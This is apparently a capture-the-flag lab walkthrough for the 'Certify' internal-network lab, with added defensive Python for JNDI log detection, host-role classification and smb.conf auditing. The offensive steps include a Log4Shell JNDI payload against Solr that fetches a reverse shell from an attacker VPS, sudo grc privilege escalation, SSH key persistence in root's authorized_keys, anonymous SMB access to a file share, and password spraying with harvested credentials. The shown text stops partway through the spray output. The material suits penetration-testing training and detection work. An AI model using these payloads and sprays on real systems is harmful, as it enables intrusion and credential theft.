Certify is a medium-difficulty lab environment. Completing the challenge helps players learn the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, deepens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The lab has 4 flags, spread across different hosts.


External foothold

fscan scan

E:\渗透工具\漏扫\fxray-main\fxray-main\fscan>fscan.exe -h 39.98.127.63

        ██╗  ██╗     ███████╗██╗  ██╗██████╗
        ╚██╗██╔╝     ██╔════╝╚██╗██╔╝██╔══██╗
         ╚███╔╝█████╗█████╗   ╚███╔╝ ██████╔╝
         ██╔██╗╚════╝██╔══╝   ██╔██╗ ██╔═══╝
        ██╔╝ ██╗     ███████╗██╔╝ ██╗██║
        ╚═╝  ╚═╝     ╚══════╝╚═╝  ╚═╝╚═╝
                     xk version: 1.8.3
start infoscan
39.98.127.63:8983 open
39.98.127.63:80 open
39.98.127.63:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.98.127.63       code:200 len:612    title:Welcome to nginx!
[*] WebTitle http://39.98.127.63:8983  code:302 len:0      title:None 跳转url: http://39.98.127.63:8983/solr/
[*] WebTitle http://39.98.127.63:8983/solr/ code:200 len:16555  title:Solr Admin

Information gathering: Solr 8.11.0

A search of my own vulnerability notes turned it up.

First start an LDAP server on the VPS:

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSIP

Fire the POC directly:

http://39.98.127.63:8983/solr/admin/collections?action=${jndi:ldap://VPSIP:1389/Basic/ReverseShell/VPSIP/9999}&wt=json

Then just open it in the browser.

Shell obtained.

The privileges are clearly low.
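
From the defender's side, the request above shows up in the Solr or nginx access log. The Python below is an added example, not code from the original post: it scans constructed access-log lines for a JNDI lookup in the query string, URL-decoding first and collapsing the single-character `${lower:x}`/`${upper:x}`/`${::-x}` wrappers that would otherwise hide the `${jndi:` keyword from a plain substring match. The client IPs, the listener address 203.0.113.9 and the log lines themselves are constructed.

```python
import re
from urllib.parse import unquote

# Constructed nginx/Solr access-log lines ("combined" format). The first one
# mirrors the collections?action=${jndi:...} request above, URL-encoded as a
# browser sends it; the second hides the keyword behind a ${lower:j} wrapper.
# Client IPs and the listener address (203.0.113.9) are placeholders.
SAMPLE_LOG = r"""
10.0.0.5 - - [28/Aug/2025:11:20:59 +0000] "GET /solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2FBasic%2FReverseShell%2F203.0.113.9%2F9999%7D&wt=json HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.6 - - [28/Aug/2025:11:21:03 +0000] "GET /solr/admin/collections?action=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fa%7D&wt=json HTTP/1.1" 200 612 "-" "curl/7.68.0"
10.0.0.7 - - [28/Aug/2025:11:21:10 +0000] "GET /solr/admin/collections?action=LIST&wt=json HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
10.0.0.8 - - [28/Aug/2025:11:21:15 +0000] "GET /solr/ HTTP/1.1" 200 16555 "-" "Mozilla/5.0"
"""

# Request line of the combined log format: ip ident user [time] "METHOD target PROTO"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# Single-character lookup wrappers (${lower:j}, ${upper:J}, ${::-j}) that are
# used to split the "jndi" keyword so a naive substring match misses it.
WRAPPER_RE = re.compile(r'\$\{(?:lower|upper):(.)\}|\$\{::-(.)\}', re.IGNORECASE)
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalize(target: str) -> str:
    """URL-decode (repeatedly, for double encoding) and unwrap the lookups."""
    decoded = target
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    prev = None
    while prev != decoded:  # wrappers can be nested, so iterate to a fixed point
        prev = decoded
        decoded = WRAPPER_RE.sub(lambda m: m.group(1) or m.group(2), decoded)
    return decoded.lower()


def find_jndi_requests(log_text: str) -> list:
    """Return one dict per request whose normalized target carries a JNDI lookup."""
    hits = []
    for line in log_text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        norm = normalize(m.group("target"))
        if JNDI_RE.search(norm):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "target": norm})
    return hits


if __name__ == "__main__":
    for hit in find_jndi_requests(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} -> {hit["target"]}')
```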

grc privilege escalation

Running sudo -l shows that /usr/bin/grc can be run through sudo without a password:

sudo /usr/bin/grc --pty /bin/sh

Privilege escalation succeeded; next we use python3 to spawn a stable interactive terminal:

python3 -c 'import pty; pty.spawn("/bin/bash")'

flag01 obtained.

To make post-exploitation easier, we drop our public key onto the box:

echo "ssh-rsa <your-public-key>" > /root/.ssh/authorized_keys

Then we can SSH in straight from the VPS:

ssh root@39.98.127.63

Internal lateral movement

Download frp and fscan from the VPS:

wget https://VPSIP:Port/fscan
wget https://VPSIP:Port/frpc
wget https://VPSIP:Port/frpc.ini

Anything else we need can also be copied over from our own server with scp:

scp * root@39.98.127.63:/root

fscan and nmap scans

Now we use fscan to scan the internal network; first check the local IP:

ifconfig

root@ubuntu:~# ./fscan -h 172.22.9.19/24 -hn 172.22.9.19

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.9.47     is alive
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.26     is alive
[*] Icmp alive hosts len is: 3
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.47:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:80 open
172.22.9.7:88 open
172.22.9.47:22 open
172.22.9.47:21 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo 
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] NetBios 172.22.9.7      [+] DC:XIAORANG\XIAORANG-DC    
[*] NetInfo 
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] WebTitle http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.9.47  (Windows 6.1)
[*] NetBios 172.22.9.47     fileserver                          Windows 6.1
[*] WebTitle http://172.22.9.7         code:200 len:703    title:IIS Windows Server
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect 
# If nmap is not on the server, install it with: apt install nmap -y
nmap -sC -sV --min-rate=1000 172.22.9.0/24
Nmap scan report for 172.22.9.7
Host is up (0.00031s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-28 11:20:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after:  2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after:  2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after:  2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: xiaorang.lab0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Subject Alternative Name: othername:<unsupported>, DNS:XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-28T10:57:19
|_Not valid after:  2026-08-28T10:57:19
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: XIAORANG
|   NetBIOS_Domain_Name: XIAORANG
|   NetBIOS_Computer_Name: XIAORANG-DC
|   DNS_Domain_Name: xiaorang.lab
|   DNS_Computer_Name: XIAORANG-DC.xiaorang.lab
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-28T11:23:14+00:00
| ssl-cert: Subject: commonName=XIAORANG-DC.xiaorang.lab
| Not valid before: 2025-08-27T10:35:58
|_Not valid after:  2026-02-26T10:35:58
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/28%Time=68B03BA0%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: EE:FF:FF:FF:FF:FF (Unknown)
Service Info: Host: XIAORANG-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 172.22.9.26
Host is up (0.00029s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: XIAORANG
|   NetBIOS_Domain_Name: XIAORANG
|   NetBIOS_Computer_Name: DESKTOP-CBKTVMO
|   DNS_Domain_Name: xiaorang.lab
|   DNS_Computer_Name: DESKTOP-CBKTVMO.xiaorang.lab
|   DNS_Tree_Name: xiaorang.lab
|   Product_Version: 10.0.14393
|_  System_Time: 2025-08-28T11:23:14+00:00
| ssl-cert: Subject: commonName=DESKTOP-CBKTVMO.xiaorang.lab
| Not valid before: 2025-08-27T10:35:45
|_Not valid after:  2026-02-26T10:35:45
|_ssl-date: 2025-08-28T11:23:29+00:00; 0s from scanner time.
MAC Address: EE:FF:FF:FF:FF:FF (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DESKTOP-CBKTVMO, NetBIOS user: <unknown>, NetBIOS MAC: 00:16:3e:23:2d:02 (Xensource)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-28T11:23:14
|_  start_date: 2025-08-28T10:35:45


Nmap scan report for 172.22.9.47
Host is up (0.00036s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:4d:3a:fd:c1:ba:8a:76:ed:67:c4:fe:7a:51:28:82 (RSA)
|   256 f2:c8:ee:a4:bd:aa:c4:9f:56:84:74:27:45:21:77:23 (ECDSA)
|_  256 93:46:a0:84:24:86:a9:59:c7:d8:1e:7b:46:f8:a8:b0 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: EE:FF:FF:FF:FF:FF (Unknown)
Service Info: Host: FILESERVER; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: FILESERVER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: fileserver
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: fileserver
|_  System time: 2025-08-28T19:23:15+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-28T11:23:15
|_  start_date: N/A

We can see this is a domain penetration scenario:

172.22.9.7     DC: XIAORANG\XIAORANG-DC
172.22.9.47    fileserver
172.22.9.26    DESKTOP-CBKTVMO.xiaorang.lab
172.22.9.19    already compromised; the host with internet access

To make sense of this domain we have to work out how these machines relate to each other at the AD level.

From an Active Directory perspective, the roles of these four IPs can be read as follows:


1. 172.22.9.7 (XIAORANG-DC)

  • Typical domain-controller ports are open: 53 (DNS), 88 (Kerberos), 389/636 (LDAP/LDAPS), 445 (SMB), 3268/3269 (Global Catalog), 3389 (RDP).

  • Certificate: CN = XIAORANG-DC.xiaorang.lab, marking it as the domain's authoritative authentication node.

  • Services

    • Kerberos and LDAP: identity authentication and directory services.

    • DNS: name resolution for the AD domain.

    • IIS on port 80 plus the AD CS hit (poc-yaml-active-directory-certsrv-detect): Certificate Services (AD CS) is probably installed.

  • Conclusion: this is the Domain Controller (DC), the core of the xiaorang.lab domain.


2. 172.22.9.26 (DESKTOP-CBKTVMO)

  • NetBIOS/DNS name: DESKTOP-CBKTVMO.xiaorang.lab; it is domain-joined.

  • OS version: Windows Server 2016 Datacenter (Product Version 10.0.14393).

  • Ports

    • 135/139/445 (MSRPC/SMB).

    • 3389 (RDP).

  • Security

    • SMB signing is not enabled (exposed to man-in-the-middle / relay attacks).

    • NetBIOS information shows it belongs to the XIAORANG domain.

  • Conclusion: despite the "DESKTOP" name, it is a domain member server, probably used as an application server or remote desktop host.


3. 172.22.9.47 (FILESERVER)

  • NetBIOS name: FILESERVER.

  • OS: Nmap reports Linux (Ubuntu) running Samba, which presents itself as a Windows SMB host.

  • Ports

    • 21 (FTP, vsftpd).

    • 22 (SSH, OpenSSH on Ubuntu).

    • 80 (Apache2 on Ubuntu).

    • 139/445 (Samba file sharing).

  • Mixed environment

    • The hostname says it is a file server.

    • In practice it is a Linux file server running Samba, interoperating with the Windows AD environment.

  • Conclusion: this is the domain's file-sharing server (a member server), but it runs Linux, so the domain contains heterogeneous systems.


4. 172.22.9.19

  • In the output above it appears only as the scanning origin / internet-facing host; there are no Nmap results for it.

  • It is known to reach the internet directly, so within the domain it is probably a workstation or jump host: not necessarily a key role, but its security posture matters a great deal.


5. Summary: roles within AD

  • 172.22.9.7: Domain Controller, responsible for authentication across the whole AD (Kerberos, LDAP, DNS, and possibly Certificate Services).

  • 172.22.9.26: member server (Windows Server 2016), domain-joined, running SMB/RDP, probably an application or remote desktop server.

  • 172.22.9.47: file server (Linux + Samba), the domain's file-sharing node, also offering FTP/HTTP/SSH.

  • 172.22.9.19: internet-reachable host / jump box with direct public access, a potential bridge for traffic out of the domain.
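
The classification above follows from port signatures, so it can be automated for asset inventory. Below is an added Python example (not part of the original writeup) that parses fscan-style output and assigns each host a role; the sample output is constructed from the scan above, and the role names, port heuristics and follow-up notes are my own assumptions rather than anything fscan itself reports.

```python
import re
from collections import defaultdict

# Constructed fscan-style output reproducing the host/port lines from the scan
# above (same hosts and ports); only "ip:port open" and NetBios lines are read.
SAMPLE_FSCAN = r"""
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.47:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:80 open
172.22.9.7:88 open
172.22.9.47:22 open
172.22.9.47:21 open
[*] NetBios 172.22.9.7      [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.9.47     fileserver                          Windows 6.1
"""

PORT_RE = re.compile(r'^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$')
NETBIOS_RE = re.compile(r'^\[\*\] NetBios (\d{1,3}(?:\.\d{1,3}){3})\s+(.*)$')

# Ports that normally only a domain controller listens on (Kerberos, LDAP, GC).
DC_PORTS = {88, 389, 636, 3268, 3269}


def parse_fscan(text):
    """Return ({ip: set(ports)}, {ip: netbios banner}) from fscan output."""
    ports, names = defaultdict(set), {}
    for raw in text.strip().splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            ports[m.group(1)].add(int(m.group(2)))
            continue
        m = NETBIOS_RE.match(line)
        if m:
            names[m.group(1)] = m.group(2).strip()
    return ports, names


def classify(ports, name=""):
    """Heuristic role from the open-port signature plus the NetBIOS banner."""
    if ports & DC_PORTS or "DC:" in name:
        return "domain controller"
    if 445 in ports and 22 in ports:
        return "samba file server (likely Linux)"
    if 445 in ports and 135 in ports:
        return "windows member host"
    return "other" if ports else "unknown"


def notes(ports, role):
    """Follow-up points a defender would record for each host (assumed rules)."""
    out = []
    if role == "domain controller" and 80 in ports:
        out.append("HTTP on a DC: check whether AD CS web enrollment (certsrv) is exposed")
    if 21 in ports:
        out.append("FTP listening: credentials travel in cleartext")
    if 445 in ports:
        out.append("SMB listening: verify signing is required")
    return out


def inventory(text):
    """Map each host to its ports, banner, role and notes, ordered by address."""
    ports, names = parse_fscan(text)
    result = {}
    for ip in sorted(set(ports) | set(names), key=lambda s: tuple(map(int, s.split(".")))):
        p, n = ports.get(ip, set()), names.get(ip, "")
        role = classify(p, n)
        result[ip] = {"ports": sorted(p), "name": n, "role": role, "notes": notes(p, role)}
    return result


if __name__ == "__main__":
    for ip, info in inventory(SAMPLE_FSCAN).items():
        print(ip, info["role"], info["ports"], info["name"])
```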


SMB anonymous login

We can see that FILESERVER at .47 has SMB exposed.

First bring up frp, then go at SMB directly through the proxy; if you don't want smbclient.py, connecting with a plain client works as well.

proxychains smbclient.py 172.22.9.47

Enter the commands:

shares
# list the available shares

use fileshare
# select the share before listing or transferring files

  • fileshare: an ordinary file share configured by the administrator, set browseable and permitting anonymous/guest read (or read/write, depending on smb.conf). To list, download or upload files you have to select it first with use fileshare.

  • IPC$: the inter-process communication share, used for named pipes / RPC (enumeration, session setup and so on); it holds no files, so you cannot ls ordinary directories inside it.

  • print$: the printer-driver share, from which clients fetch drivers; normally read-only with restricted permissions, and not used as a general file store.

So in Impacket's interactive client, shares only tells you which shares exist; to actually reach files you first have to select a usable data share. Right now the only one open to anonymous access is fileshare.
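
The anonymous access relied on here is a Samba configuration choice, so it is worth being able to spot it in smb.conf. The Python below is an added example, not code from the post or the lab: it parses a constructed smb.conf fragment that reproduces the weak [fileshare] setup (guest mapping on, guest-readable share, SMB1 allowed, signing not mandatory) and reports what to tighten, and checks that a hardened fragment produces no findings. The paths, group name and rule set are assumptions.

```python
import configparser
import io

# Constructed smb.conf reproducing the weak setup implied above: guest mapping
# enabled globally and a browseable, guest-readable [fileshare]. Paths assumed.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Bad User
   server min protocol = NT1

[fileshare]
   path = /srv/samba/fileshare
   browseable = yes
   guest ok = yes
   read only = yes

[print$]
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
"""

# The same share with guest access removed and the transport tightened.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = Never
   server min protocol = SMB2
   server signing = mandatory

[fileshare]
   path = /srv/samba/fileshare
   browseable = yes
   guest ok = no
   read only = yes
   valid users = @fileshare-users
"""

SMB1_DIALECTS = {"NT1", "LANMAN1", "LANMAN2", "CORE", "COREPLUS"}


def _truthy(value):
    return value.strip().lower() in {"yes", "true", "1"}


def load_smb_conf(text):
    """smb.conf is INI-like, so configparser can read it (no interpolation)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_file(io.StringIO(text))
    return cp


def audit_smb_conf(text):
    """Return (section, finding) tuples for guest access and weak transport settings."""
    cp = load_smb_conf(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    if g.get("map to guest", "never").strip().lower() != "never":
        findings.append(("global", "map to guest allows unauthenticated sessions"))
    if g.get("server min protocol", "SMB2_02").strip().upper() in SMB1_DIALECTS:
        findings.append(("global", "SMB1 (NT1) still allowed"))
    if g.get("server signing", "default").strip().lower() not in {"mandatory", "required"}:
        findings.append(("global", "server signing not mandatory"))
    for section in cp.sections():
        if section == "global":
            continue
        s = cp[section]
        guest = _truthy(s.get("guest ok", "no")) or _truthy(s.get("public", "no"))
        if guest:
            writable = (_truthy(s.get("writable", "no")) or _truthy(s.get("write ok", "no"))
                        or not _truthy(s.get("read only", "yes")))
            findings.append((section, "guest-readable share" + (", and writable" if writable else "")))
    return findings


if __name__ == "__main__":
    for section, finding in audit_smb_conf(WEAK_SMB_CONF):
        print(f"[{section}] {finding}")
```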

Running ls shows a few files, including a directory named secret:

cd secret
ls
cat flag02.txt

get personnel.db

If get fails, we fall back to the other anonymous login method:

└─# proxychains smbclient \\\\172.22.9.47\\fileshare -U anonymous

Then go through the same steps.

Take a look at what is in the db.

In the end there are four possibly valid passwords:

admin
i9XDE02pLVf
6N70jt2K9sV
fiAzGwEMgTY

and a long list of possibly valid usernames extracted from the same database.


Save them as username.txt and pass.txt respectively.

Then we go straight to password spraying:

proxychains hydra -L username.txt -P pass.txt 172.22.9.26 rdp >>result.txt
cat result.txt | grep account

or

proxychains crackmapexec smb 172.22.9.26 -u username.txt -p pass.txt 2>/dev/null

A moment's thought says .26 is the host to spray; the DC is not going to fall at this stage.

The spray takes a long time, roughly ten-odd minutes.

└─# proxychains crackmapexec smb 172.22.9.26 -u username.txt -p pass.txt 2>/dev/null

SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangmei:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangmei:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangmei:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangmei:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuqiang:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuqiang:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuqiang:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lihong:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lihong:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lihong:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lilei:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lilei:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wanghuan:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wanghuan:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wanghuan:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wanghuan:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangxin:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangxin:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangxin:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangxin:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangping:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangping:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangping:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\yangping:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lijie:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lijie:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lijie:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\lijie:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangqian:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangqian:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangqian:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\wangqian:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liping:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liping:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liping:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liping:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuhui:admin STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuhui:i9XDE02pLVf STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuhui:6N70jt2K9sV STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\liuhui:fiAzGwEMgTY STATUS_LOGON_FAILURE 
SMB         172.22.9.26     445    DESKTOP-CBKTVMO  [-] xiaorang.lab\zhangming:admin STATUS_LOGON_FAILURE 
